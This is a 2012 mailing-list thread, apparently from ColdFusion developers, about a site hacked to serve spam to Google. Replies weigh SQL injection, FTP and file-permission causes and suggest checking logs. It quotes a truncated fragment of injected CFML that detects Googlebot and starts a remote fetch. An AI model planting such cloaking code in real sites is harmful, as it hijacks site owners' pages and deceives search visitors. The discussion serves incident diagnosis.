Anybody seen this hack/exploit?

2012-11-13 Thread Les Mizzell
Recently a site of ours got hacked - basically, a Google search of the site was returning viagra info! What we got was a small script added to the end of a functions.cfm file:
<cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /> <cfif (Find( "google", REQUEST.UserAgent ))> <cfhttp method="get"

Re: Anybody seen this hack/exploit?

2012-11-13 Thread Matt Quackenbush
LOL. Wow. That's a very funny script! Not funny that it happened to you, of course, but that's just awesome. Issues like this are typically caused by either SQL injection (i.e. didn't use cfqueryparam) or some sort of FTP vulnerability. My first step would be to make sure that *every* cfquery

Re: Anybody seen this hack/exploit?

2012-11-13 Thread Les Mizzell
> Issues like this are typically caused by either SQL injection (i.e. didn't use cfqueryparam) or some sort of FTP vulnerability. My first step would be to make sure that *every* cfquery that accepts any input of any kind from users is utilizing cfqueryparam.

Everything is paramed to the

Re: Anybody seen this hack/exploit?

2012-11-13 Thread Matt Quackenbush
It doesn't have to have queries on it. Does it output data? That said, it sounds like some other sort of exploit.

On Tue, Nov 13, 2012 at 3:30 PM, Les Mizzell lesm...@bellsouth.net wrote:
> Issues like this are typically caused by either SQL injection (i.e. didn't use cfqueryparam) or

Re: Anybody seen this hack/exploit?

2012-11-13 Thread Nathan Strutz
I think it sounds like one developer was trying to destroy your search ranking by giving googlebot to an obvious spam page. (don't they know about robots.txt?) Too bad for you guys, google now makes a web browser, and thus your problem. No standard exploit will inject CFML into a page unless

Re: Anybody seen this hack/exploit?

2012-11-13 Thread Yuliang Ruan
> Recently a site of ours got hacked - basically, a Google search of the site was returning viagra info! What we got was a small script added to the end of a functions.cfm file:
> <cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /> <cfif (Find( "google", REQUEST.UserAgent ))> <cfhttp method="get"

Re: Anybody seen this hack/exploit?

2012-11-13 Thread Donnie Bachan (Gmail)
I've seen something like this on a shared server that was running osCommerce. The uploads directory had the wrong permissions set; the attacker uploaded a server admin script that could set permissions on other directories. They were then able to inject code into every index.php, index.html,

Re: Anybody seen this hack/exploit?

2012-11-13 Thread Kym Kovan
Just to put the record straight, it is entirely possible to create files using SQL scripts if permissions allow it. That SQL Injection was possible was demonstrated to Allaire by putting a file in the C:\ directory of their main production website using SQL Injection... :-)

On 14/11/2012

Re: Anybody seen this hack/exploit?

2012-11-13 Thread Russ Michaels
Firstly, you should try to determine when the hack was done. Check the last modified date of the file in question (unless you have already edited it since). Then ask your host to check the FTP logs for that date and see if anyone accessed that file on that date; this will rule out FTP as the

Re: Anybody seen this hack/exploit?

2012-11-13 Thread Dave Watts
> I think it sounds like one developer was trying to destroy your search ranking by giving googlebot to an obvious spam page. (don't they know about robots.txt?) Too bad for you guys, google now makes a web browser, and thus your problem. No standard exploit will inject CFML into a page

Re: Anybody seen this hack/exploit?

2012-11-13 Thread Dave Watts
> Everything is paramed to the hilt - I sanitize all form vars BEFORE the query, and then use cfqueryparam on top of that ... so I'm guessing we're looking at a ftp vulnerability.

What about URL, CGI and Cookie scopes? All of those can cause the same problems.

> Question though - how could an

Re: Anybody seen this hack/exploit?

2012-11-13 Thread Justin Scott
> ...lax server security. We've got a boatload of stuff on this site to prevent SQL injection, including Justin D. Scott's application script, carefully checking anything that goes into the database, ...

I haven't looked at the rest of the thread yet, but I would note that the script I wrote is